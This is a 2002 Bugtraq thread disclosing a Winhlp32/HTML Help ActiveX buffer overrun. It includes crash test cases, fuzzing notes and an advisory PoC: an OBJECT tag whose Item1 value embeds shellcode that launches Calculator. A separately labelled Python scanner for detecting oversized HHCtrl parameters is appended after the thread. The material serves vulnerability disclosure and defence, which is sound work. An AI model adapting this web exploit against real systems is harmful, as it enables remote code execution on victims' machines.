Bugtraq mailing list archives
RE: Winhelp32 Remote Buffer Overrun
From: "Drew" <dcopley () eeye com>
Date: Tue, 6 Aug 2002 19:30:32 -0700
Running this on my local file fuzzer, Litchfield's begins to hit exceptions at 200 increments. (At a blank value it gives a memory error.) At 216 increments (and at least for a while, above) it overwrites EIP with 41414141. (Windows 2000 Service Pack 2.) Testing Jelmer's as it was written below I ran to 10,000 increments and did not find an issue. Testing to 10,000 with .TIF as the extension did not find an issue. Testing these same case tests using the method HHClick() as in Litchfield's does not give an issue. It may have been with another method, or perhaps some interaction with the webpage. It may be the characters used to bruteforce it. Perhaps they were unicode (which I could test, as well as anything else).
-----Original Message-----
From: Mark Litchfield [mailto:mark () ngssoftware com]
Sent: Tuesday, August 06, 2002 12:24 PM
To: Jelmer; bugtraq () securityfocus com
Subject: Re: Winhelp32 Remote Buffer Overrun

If I am not mistaken, I believe that Microsoft are aware of this issue and have an IE patch coming out very shortly. My brother reported this to them, please see http://www.nextgenss.com/vna/ms-whelp.txt

Regards

Cheers,
Mark Litchfield

----- Original Message -----
From: "Jelmer" <jelmer () kuperus xs4all nl>
To: "Next Generation Insight Security Research Team" <mark () ngssoftware com>; <bugtraq () securityfocus com>; <ntbugtraq () listser ntbugtraq com>
Sent: Thursday, August 01, 2002 5:19 PM
Subject: Re: Winhelp32 Remote Buffer Overrun

I just installed service pack 3 and the following code still crashed my IE6 with a "memory could not be referenced" error.

<OBJECT ID=hhctrl TYPE="application/x-oleobject" CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Shortcut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",,">
<PARAM name="Item2" value="273,1,1">
<PARAM name="codebase" value="">
<PARAM name="Font" value=" A VERY VERY LONG STRING ">
</OBJECT>

I have been told this means it is most likely exploitable. I am not into buffer overflows myself though, maybe someone can confirm this. Anyways I notified Microsoft of this several months ago. The day after I notified them someone pointed me to the ngssoftware advisory *sob*, and I notified Microsoft that this was probably the same issue; last I heard from them they were looking into if this was indeed the case. It's been several months and as far as I know they are still looking.
--
jelmer

----- Original Message -----
From: "Next Generation Insight Security Research Team" <mark () ngssoftware com>
To: <bugtraq () securityfocus com>; <ntbugtraq () listser ntbugtraq com>
Sent: Friday, August 02, 2002 3:59 AM
Subject: Winhelp32 Remote Buffer Overrun

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NGSSoftware Insight Security Research Advisory

Name: Winhlp32.exe Remote Buffer Overrun
Systems Affected: Win2K Platform
Severity: Critical
Category: Remote Buffer Overrun
Vendor URL: http://www.mircosoft.com
Author: Mark Litchfield (mark () ngssoftware com)
Date: 1st August 2002
Advisory number: #NISR01082002

Description
***********

Many of the features available in HTML Help are implemented through the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX control is used to provide navigation features (such as a table of contents), to display secondary windows and pop-up definitions, and to provide other features. The HTML Help ActiveX control can be used from topics in a compiled Help system as well as from HTML pages displayed in a Web browser. The functionality provided by the HTML Help ActiveX control will run in the HTML Help Viewer or in any browser that supports ActiveX technology, such as Internet Explorer (version 3.01 or later). Some features, as with the WinHlp Command, provided by the HTML Help ActiveX control are meant to be available only when it is used from a compiled HTML Help file (.chm) that is displayed by using the HTML Help Viewer.
Details
*******

Winhlp32.exe is vulnerable to a buffer overrun attack using the Item parameter within the WinHlp Command. The item parameter is used to specify the file path of the WinHelp (.hlp) file in which the WinHelp topic is stored, and the window name of the target window. Using this overrun, an attacker can successfully execute arbitrary code on a remote system by either encouraging the victim to visit a particular web page, whereby code would execute automatically, or by including the exploit within the source of an email. In regards to email, execution would automatically occur when the mail appears in the preview pane and ActiveX objects are allowed (this is allowed by default; the Internet Security Settings would have to be set as HIGH to prevent execution of this vulnerability). Any exploit would execute in the context of the logged on user.

Visual POC Exploit
******************

This POC will simply display Calculator. Please note that this was written on a Win2k PC with SP2 installed. I have not tested it on anything else.

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0>
<PARAM NAME="Width" VALUE="26">
<PARAM NAME="Height" VALUE="26">
<PARAM NAME="Command" VALUE="WinHelp">
<PARAM NAME="Item1" VALUE="3ÀPhcalc4$ƒÀPV¸¯§éwÿÐ3ÀP¾”éwÿÖAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒÆÿægMyWindow">
<PARAM NAME="Item2" VALUE="NGS Software LTD">
</OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

Fix Information
***************

NGSSoftware alerted Microsoft to these problems on the 6th March 2002. NGSSoftware highly recommend installing Microsoft Windows SP3, as the fix has been built into this service pack found at http://www.microsoft.com. An alternative to these patches would be to ensure the security settings found in the Internet Options is set to high.
Despite the Medium setting, stating that unsigned ActiveX controls will not be downloaded, Kylie will still execute Calc.exe. Another alternative would be to remove winhlp32.exe if it is not required within your environment.

A check for these issues has been added to Typhon II, of which more information is available from the NGSSoftware website, http://www.ngssoftware.com.

Further Information
*******************

For further information about the scope and effects of buffer overflows, please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
a+qSkYWrz7uspZcqqRTc2r0C
=2PKN
-----END PGP SIGNATURE-----
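An added defensive example, not part of this thread or of NGSSoftware's advisory: a small Python content scanner for a mail gateway or web proxy that flags an HTML Help ActiveX object (CLSID adb880a6-d8ff-11cf-9377-00aa003b7a11) whenever one of its PARAM values is far longer than any real help-shortcut argument. It accepts both attribute styles seen in the thread's two PoCs (quoted CLASSID and unquoted classid=clsid:...); the 200-byte threshold (taken from where Drew's fuzzing first saw exceptions), the sample pages and the function names are assumptions of this example.

```python
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx) named in the advisory.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Assumed threshold: Drew's fuzz run first hit exceptions around 200 bytes.
MAX_PARAM_LEN = 200

class HHCtrlScanner(HTMLParser):
    """Collects every <OBJECT> bound to HHCtrl.ocx together with its <PARAM>s."""
    def __init__(self):
        super().__init__()
        self._in_hhctrl = False
        self.objects = []  # one {"id": ..., "params": {...}} per hhctrl object

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            # Normalise quoted/unquoted, any-case, braced or "clsid:"-prefixed values.
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{}")
            self._in_hhctrl = clsid == HHCTRL_CLSID
            if self._in_hhctrl:
                self.objects.append({"id": a.get("id", ""), "params": {}})
        elif tag == "param" and self._in_hhctrl:
            self.objects[-1]["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._in_hhctrl = False

def find_suspicious_hhctrl(html):
    """Return (object id, Command value, param name, length) for each oversized
    PARAM of an HHCtrl object; an empty list means the content looks benign."""
    scanner = HHCtrlScanner()
    scanner.feed(html)
    hits = []
    for obj in scanner.objects:
        command = obj["params"].get("command", "")
        for name, value in obj["params"].items():
            if len(value) > MAX_PARAM_LEN:
                hits.append((obj["id"], command, name, len(value)))
    return hits

# Constructed sample mirroring the shape of Jelmer's PoC: Font padded out.
SAMPLE_BAD = ('<OBJECT ID=hhctrl TYPE="application/x-oleobject" '
              'CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">'
              '<PARAM name="Command" value="Shortcut">'
              '<PARAM name="Font" value="' + "A" * 300 + '"></OBJECT>')
# Constructed benign use of the same control with short arguments.
SAMPLE_OK = ('<object classid=clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11 id=winhelp>'
             '<param name="Command" value="WinHelp">'
             '<param name="Item1" value="help.hlp>MyWindow"></object>')
```

Feed the scanner a decoded message body or fetched page; a non-empty result names the object, the Command used (WinHelp or Shortcut in this thread) and the offending parameter, which is enough for a quarantine rule.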